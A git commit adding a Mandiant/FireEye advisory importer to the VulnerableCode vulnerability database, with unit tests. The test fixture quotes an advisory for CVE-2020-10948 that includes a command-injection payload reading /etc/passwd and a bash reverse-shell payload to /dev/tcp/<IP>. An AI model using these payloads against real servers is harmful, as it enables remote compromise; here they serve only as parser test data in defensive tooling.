Add Fireeye importer

ziadhany · ziadhany · commit 4270fd998fae · 2022-07-11T02:05:59.000+02:00
Reference: #487 Signed-off-by: Ziad <ziadhany2016@gmail.com>
diff --git a/vulnerabilities/importers/fireeye.py b/vulnerabilities/importers/fireeye.py
@@ -0,0 +1,99 @@
+#
+# Copyright (c) nexB Inc. and others. All rights reserved.
+# VulnerableCode is a trademark of nexB Inc.
+# SPDX-License-Identifier: Apache-2.0
+# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
+# See https://github.com/nexB/vulnerablecode for support or download.
+# See https://aboutcode.org for more information about nexB OSS projects.
+#
+import os
+from typing import Iterable
+
+from fetchcode.vcs.git import fetch_via_git
+
+from vulnerabilities.importer import AdvisoryData
+from vulnerabilities.importer import Importer
+from vulnerabilities.importer import Reference
+from vulnerabilities.importer import logger
+from vulnerabilities.utils import build_description
+
+
+class FireyeImporter(Importer):
+    spdx_license_expression = "CC0-1.0"
+    license_url = "https://github.com/cloudsecurityalliance/gsd-database/blob/main/LICENSE"
+    url = "git+https://github.com/mandiant/Vulnerability-Disclosures"
+
+    def advisory_data(self) -> Iterable[AdvisoryData]:
+        forked_dir = fork_and_get_dir(self.url)
+        for file in get_files(forked_dir):
+            yield parse_advisory_data(file)
+
+
+def ForkError():
+    pass
+
+
+def fork_and_get_dir(url) -> dict:
+    try:
+        fork_directory = fetch_via_git(url=url)
+        return fork_directory.dest_dir
+    except Exception as e:
+        logger.error(f"Can't clone url {url}")
+        raise ForkError() from e
+
+
+def get_files(fork_directory):
+    for root, _, files in os.walk(fork_directory):
+        if root in [".git"]:
+            continue
+        for file in files:
+            if file.endswith(".md") and not file == "README.md":
+                with open(os.path.join(root, file), "r", encoding="ISO-8859-1") as f:
+                    print(file)
+                    yield f.read()
+
+
+def parse_advisory_data(raw_data) -> AdvisoryData:
+    raw_data = raw_data.replace("\n\n", "\n")
+    md_list = raw_data.split("\n")
+    md_dict = md_list_to_dict(md_list)
+
+    database_id = md_list[0][1::]
+    summary = md_dict.get(database_id[1::]) or []
+    description = md_dict.get("## Description") or []
+    impact = md_dict.get("## Impact")
+    exploit_ability = md_dict.get("## Exploitability")
+    cve_ref = md_dict.get("## CVE Reference") or []
+    tech_details = md_dict.get("## Technical Details")
+    resolution = md_dict.get("## Resolution")
+    disc_credits = md_dict.get("## Discovery Credits")
+    disc_timeline = md_dict.get("## Disclosure Timeline")
+    references = md_dict.get("## References") or []
+
+    return AdvisoryData(
+        aliases=get_aliases(database_id, cve_ref),
+        summary=build_description("".join(summary), "".join(description)),
+        references=get_references(references),
+        # date_published=disc_timeline,
+    )
+
+
+def get_references(references):
+    return [Reference(url=ref[2::]) for ref in references if ref]
+
+
+def get_aliases(database_id, cve_ref) -> []:
+    cve_ref.append(database_id)
+    return cve_ref
+
+
+def md_list_to_dict(md_list):
+    md_dict = {}
+    md_key = ""
+    for md_line in md_list:
+        if md_line.startswith("#"):
+            md_dict[md_line] = []
+            md_key = md_line
+        else:
+            md_dict[md_key].append(md_line)
+    return md_dict
diff --git a/vulnerabilities/tests/test_fireeye.py b/vulnerabilities/tests/test_fireeye.py
@@ -0,0 +1,131 @@
+#
+# Copyright (c) nexB Inc. and others. All rights reserved.
+# VulnerableCode is a trademark of nexB Inc.
+# SPDX-License-Identifier: Apache-2.0
+# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
+# See https://github.com/nexB/vulnerablecode for support or download.
+# See https://aboutcode.org for more information about nexB OSS projects.
+#
+from unittest import TestCase
+
+from vulnerabilities.importer import Reference
+from vulnerabilities.importers.fireeye import get_aliases
+from vulnerabilities.importers.fireeye import get_references
+from vulnerabilities.importers.fireeye import md_list_to_dict
+
+
+class TestFireeyeImporter(TestCase):
+    def test_md_list_to_dict(self):
+        md_list = [
+            "# FEYE-2020-0004",
+            "## Description",
+            "AlienForm v2.0.2 CGI script is vulnerable to remote code execution leading to server compromise by attackers. This vulnerability could be a derivative or unexplored area of CVE-2002-0934.",
+            "## Impact",
+            "High - Successful exploitation of this vulnerability results in the attacker remotely executing code on the affected systems. Remote code execution could lead to complete system compromise and the ability to gain access to user credentials and/or move laterally throughout the compromised environment.",
+            "## Exploitability",
+            "High - An attacker needs only to identify the affected CGI script is present on the server; a simple directory brute force can reveal the presence of the vulnerable CGI file.",
+            "## CVE Reference",
+            "CVE-2020-10948",
+            "## Technical Details",
+            "Mandiant discovered the affected server is vulnerable to command injection in CGI argument parameters",
+            "Affected URL:",
+            "http://<affected host>//cgibin/af2.cgi",
+            "Example attack payload:",
+            "POST //cgibin/af2.cgi HTTP/1.1 <br>",
+            "Host: <affected host> <br>",
+            "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 <br>",
+            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <br>",
+            "Accept-Language: en-US,en;q=0.5 <br>",
+            "Accept-Encoding: gzip, deflate <br>",
+            "Connection: close <br>",
+            "Upgrade-Insecure-Requests: 1 <br>",
+            "Content-Length: 38 <br>",
+            "_browser_out=%7Ccat%20/etc/passwd%7C",
+            "Reverse Shell Example:",
+            "_browser_out=%7Cbash+-i+>%26+/dev/tcp/<IP>/8080+0>%261%7C",
+            "## Resolution",
+            "Defunct software no longer support by vendor; not fixed.  FireEye Mandiant recommends disabling the affected CGI Script and to avoid using legacy CGI scripts in environments which do not have security support.",
+            "## Discovery Credits",
+            "Nikhith Tummalapalli, Mandiant FireEye",
+            "## Disclosure Timeline",
+            "- 19 Dec 2019: Attempted to email Jon Hedley, jon(at)cgi.tj, to report bug; email was bounced back",
+            "- 19 Dec 2019: Searched for other contacts for Jon Hedley and Alienform via Linked-In and Twitter...no resulting contact information",
+            "- 19 Dec 2019: Determined company was defunct and software is no longer maintained.  The primary search results online were related to CVE-2002-0934, to which this bug is related and/or induced by its fix.",
+            "- 24 Mar 2020: Searched again online for new updates to AlienForm contact information; produced same results as previous.",
+            "- 24 Mar 2020: Reserved CVE with Mitre after 90 days",
+            "- 1 April 2020: Posted and notified Mitre of reference",
+            "## References ",
+            "- http://1-4a.com/cgi-bin/alienform/af.cgi",
+            "- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934",
+            "- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10948",
+        ]
+        assert md_list_to_dict(md_list) == {
+            "# FEYE-2020-0004": [],
+            "## Description": [
+                "AlienForm v2.0.2 CGI script is vulnerable to remote code execution leading to server compromise by attackers. This vulnerability could be a derivative or unexplored area of CVE-2002-0934."
+            ],
+            "## Impact": [
+                "High - Successful exploitation of this vulnerability results in the attacker remotely executing code on the affected systems. Remote code execution could lead to complete system compromise and the ability to gain access to user credentials and/or move laterally throughout the compromised environment."
+            ],
+            "## Exploitability": [
+                "High - An attacker needs only to identify the affected CGI script is present on the server; a simple directory brute force can reveal the presence of the vulnerable CGI file."
+            ],
+            "## CVE Reference": ["CVE-2020-10948"],
+            "## Technical Details": [
+                "Mandiant discovered the affected server is vulnerable to command injection in CGI argument parameters",
+                "Affected URL:",
+                "http://<affected host>//cgibin/af2.cgi",
+                "Example attack payload:",
+                "POST //cgibin/af2.cgi HTTP/1.1 <br>",
+                "Host: <affected host> <br>",
+                "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 <br>",
+                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <br>",
+                "Accept-Language: en-US,en;q=0.5 <br>",
+                "Accept-Encoding: gzip, deflate <br>",
+                "Connection: close <br>",
+                "Upgrade-Insecure-Requests: 1 <br>",
+                "Content-Length: 38 <br>",
+                "_browser_out=%7Ccat%20/etc/passwd%7C",
+                "Reverse Shell Example:",
+                "_browser_out=%7Cbash+-i+>%26+/dev/tcp/<IP>/8080+0>%261%7C",
+            ],
+            "## Resolution": [
+                "Defunct software no longer support by vendor; not fixed.  FireEye Mandiant recommends disabling the affected CGI Script and to avoid using legacy CGI scripts in environments which do not have security support."
+            ],
+            "## Discovery Credits": ["Nikhith Tummalapalli, Mandiant FireEye"],
+            "## Disclosure Timeline": [
+                "- 19 Dec 2019: Attempted to email Jon Hedley, jon(at)cgi.tj, to report bug; email was bounced back",
+                "- 19 Dec 2019: Searched for other contacts for Jon Hedley and Alienform via Linked-In and Twitter...no resulting contact information",
+                "- 19 Dec 2019: Determined company was defunct and software is no longer maintained.  The primary search results online were related to CVE-2002-0934, to which this bug is related and/or induced by its fix.",
+                "- 24 Mar 2020: Searched again online for new updates to AlienForm contact information; produced same results as previous.",
+                "- 24 Mar 2020: Reserved CVE with Mitre after 90 days",
+                "- 1 April 2020: Posted and notified Mitre of reference",
+            ],
+            "## References ": [
+                "- http://1-4a.com/cgi-bin/alienform/af.cgi",
+                "- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934",
+                "- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10948",
+            ],
+        }
+
+    def test_get_ref(self):
+        assert get_references(
+            [
+                "- http://1-4a.com/cgi-bin/alienform/af.cgi",
+                "- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934",
+                "- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10948",
+            ]
+        ) == [
+            Reference(url="http://1-4a.com/cgi-bin/alienform/af.cgi"),
+            Reference(url="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"),
+            Reference(url="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10948"),
+        ]
+
+        assert get_references([]) == []
+
+    def test_get_aliases(self):
+        assert get_aliases("MNDT-2021-0012", ["CVE-2021-44207"]) == [
+            "CVE-2021-44207",
+            "MNDT-2021-0012",
+        ]
+        assert get_aliases("MNDT-2021-0012", []) == ["MNDT-2021-0012"]
